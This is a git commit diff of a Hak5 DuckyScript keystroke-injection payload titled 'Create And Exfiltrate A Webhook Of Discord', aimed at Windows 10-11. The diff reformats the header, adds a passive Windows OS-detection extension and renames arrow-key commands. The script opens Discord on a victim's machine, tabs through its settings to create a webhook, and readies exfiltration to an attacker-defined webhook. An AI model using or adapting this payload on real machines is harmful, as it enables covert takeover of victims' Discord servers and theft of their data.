commit
0bebb446fd
|
@ -1,25 +1,69 @@
|
||||||
REM ###############################################################
|
REM_BLOCK
|
||||||
REM # |
|
###############################################################
|
||||||
REM # Title : Create And Exfiltrate A Webhook Of Discord |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Create And Exfiltrate A Webhook Of Discord #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ###############################################################
|
# #
|
||||||
|
###############################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet connection
|
REM - Internet connection
|
||||||
REM - Discord Installed
|
REM - Discord Installed
|
||||||
|
|
||||||
|
|
||||||
REM You must define the Discord server name i.e. Hak5
|
REM You must define the Discord server name i.e. Hak5
|
||||||
DEFINE #SERVER_NAME example
|
DEFINE #SERVER_NAME example
|
||||||
|
|
||||||
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
||||||
DEFINE #DISCORD_WEBHOOK example
|
DEFINE #DISCORD_WEBHOOK example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Discord app
|
REM Open Discord app
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
@ -74,11 +118,11 @@ TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
DOWN_ARROW
|
DOWNARROW
|
||||||
DELAY 500
|
DELAY 500
|
||||||
DOWN_ARROW
|
DOWNARROW
|
||||||
DELAY 500
|
DELAY 500
|
||||||
DOWN_ARROW
|
DOWNARROW
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
Loading…
Reference in New Issue